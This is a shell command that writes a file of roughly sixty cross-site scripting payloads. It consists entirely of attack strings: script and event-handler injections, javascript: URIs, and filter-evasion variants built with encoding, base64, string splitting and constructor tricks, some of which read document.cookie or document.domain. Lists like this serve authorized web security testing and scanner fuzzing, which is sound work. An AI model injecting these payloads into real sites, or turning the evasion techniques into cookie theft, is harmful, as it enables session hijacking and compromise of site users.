cat << 'EOF' > payloads/xss.txt
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
"><svg onload=confirm(document.domain)>
%3Csvg%20onload=alert(1337)%3E
<Svg Only=1 OnLoad=confirm(document.cookie)>
<svg/onload=location='javas'+'cript:'+'alert(1)'/>
<img src=x onError=alert(document.domain)>
"><img src=x onerror=prompt(1)>
<video><source onerror=alert(1)>
<svg onload=alert.constructor('alert(1)')()>
%3Cimg%20src=x%20onerror=alert(%22WAF%22)%3E
<Img Src=OnXSS OnError=confirm(1337)>
javascript:alert(1)
<iframe src=javascript:alert(1)>
<body onload=alert(1)>
<svg onload=eval(atob('YWxlcnQoMSk='))>
"><track/onerror=confirm(`1`)>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg==" type="image/svg+xml">
<svg onload=(function(){alert(1)})()>
%00<script>alert(1)</script>
%2522%253E%253Csvg%2520onload%253Dalert%25281%2529%253E
<svg%09onload=alert(1)>
javascript%3Aalert(1)
<svg onmouseover=confirm(document.domain)>
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg onload=alert&#x00000040"1")>
%0Ajavascript%3Aalert(1)
<svg%20onload=alert%28document.domain%29>
<a href=javascript:alert(1)>xss</a>
<svg onload=prompt(document.domain)>
%3Cinput%20onfocus%3Dalert(1)%3Eautofocus
<svg%0Aonauxclick=0;[1].some(confirm)>
<img%20src=x%20onerror=prompt%28document.domain%29>
<svg onload=Set.constructor('alert(1)')()>
%0d%0a%20<img src=x onerror=alert(1)>
<svg onload=window['al'+'ert'](1)>
%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
<svg onload=eval('ale'+'rt(1)')>
<img src=x onerror=alert(/XSS/)>
<svg%20onload=confirm%26%230000000040"1")>
%u0061%u006c%u0065%u0072%u0074(1)
<svg onload=location=`javas`+`cript:alert(1)`>
<iframe srcdoc='<script>alert(1)</script>'>
<svg onpointerenter=alert(1)>
<img src=x onerror=alert(document.cookie)>
%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E
<svg onload=alert?.(1)>
<body onfocus=alert(1) autofocus>
<svg%0Donload="window['alert'](document.cookie)">
<a onmouseover=alert(1)>xss</a>
<svg onload=parent[/al/.source+/ert/.source](1)>
<img src=1 onerror=alert(1)>
%3Csvg%20onload=alert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E
<svg onload=top['ale'+'rt'](1)>
<video poster=javascript:alert(1)//>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
%0A%3Cscript%3Ealert(1)%3C%2Fscript%3E
<svg onload=\u0061\u006c\u0065\u0072\u0074(1)>
EOF
